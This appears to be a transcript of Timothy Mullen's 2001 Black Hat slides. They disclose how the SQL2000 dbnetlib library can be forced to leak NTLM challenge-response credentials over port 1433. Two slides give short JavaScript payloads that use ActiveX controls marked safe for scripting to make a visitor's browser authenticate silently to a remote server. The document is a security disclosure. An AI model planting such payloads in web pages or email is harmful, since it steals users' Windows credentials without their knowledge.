FBI Identifies known vulnerabilities as entry point to
Download
Report
Transcript FBI Identifies known vulnerabilities as entry point to
Grabbin’ Creds:
Forcing SQL libs to
deliver LM/NT challenge and
response on the back
channel…
Timothy M. Mullen
AnchorIS.Com, Inc.
[email protected]
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
1
The Culprit:
SQL2000 Super Sockets Lib
• New functions in dbnetlib.dll!
• Supports TCP/IP Sockets, encryption,
authentication, etc.
• Default library on workstations that
have SQL2k client utilities installed.
(MSDE as well?)
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
2
Backgrounders…
• SQL 7 also supported TCP/IP sockets,
but only for Mixed Mode authentication
(SQL maintained its own accounts)
• Integrated Authentication (NTLM Creds)
needed Named Pipes
• Named Pipes required 139/445 open to
authenticating system.
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
3
Backgrounders… cont.
• Integrated Authentication has _always_
been the recommended configuration.
• 139/445 has long been blocked at the
router (if not, you are a yum-yum.)
• Many server-to-server apps
authenticate over TCP 1433 because it
is “safe” .
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
4
The Skinny
• DBNETLIB now directly supports
integrated authentication over standard
TCP/IP sockets – default port 1433.
• The LM/NTLM challenge/response pairs
can now be sent out via 1433 (other
other ports if changed)
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
5
The Problem
• Many routers, though specifically
blocking 139/445, still allow established
traffic out- I.e. 1433 outbound is free to
pass.
• Many have 1433 explicitly open for
application support, server-to-server
queries, etc.
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
6
The Sting
• Client side ODBC connections can
specify the target server, authentication
type, and the library to use.
• Web sites can request client to perform
ADODB recordset requests, as well as
other tasks.
• HTML email as well.
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
7
Somewhat Lame Example
• Web site with following tag:
{
conn=new ActiveXObject("ADODB.Connection");
conn.ConnectionString='Provider=SQLOLEDB.1;Integrated
Security=SSPI;Persist Security Info=False;Initial
Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib';
conn.Open();
}
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
8
Example Cont…
• User is presented with “This page is
accessing a data source from another
domain. Do you want to allow this?”
dialog box.
• Easily engineered around…
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
9
Not So Lame Example
• Lets try this one:
{
ns = new ActiveXObject("SQLNS.SQLNamespace");
ns.Initialize ("Grabber", 2,
"Server=10.1.1.1;Trusted_Connection=Yes;Network
Library=dbnetlib.dll");
}
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
10
What’s the difference?
• SQLNamespace, SQL Distribution
Control, and SQL Merge control are all
scriptable, and are marked _safe for
scripting_ !
• Silently grab the creds for fun and
profit!
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
11
Live Demo
• Don’t try this at home! Professional
driver on closed course.
Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001
12
Thanks!
AnchorIS.Com
HammerofGod
www.anchoris.com
www.hammerofgod.com
Timothy M. Mullen
[email protected]
[email protected]
Timothy Mullen, AnchorIS.Com
Blackhat Vegas 2001
13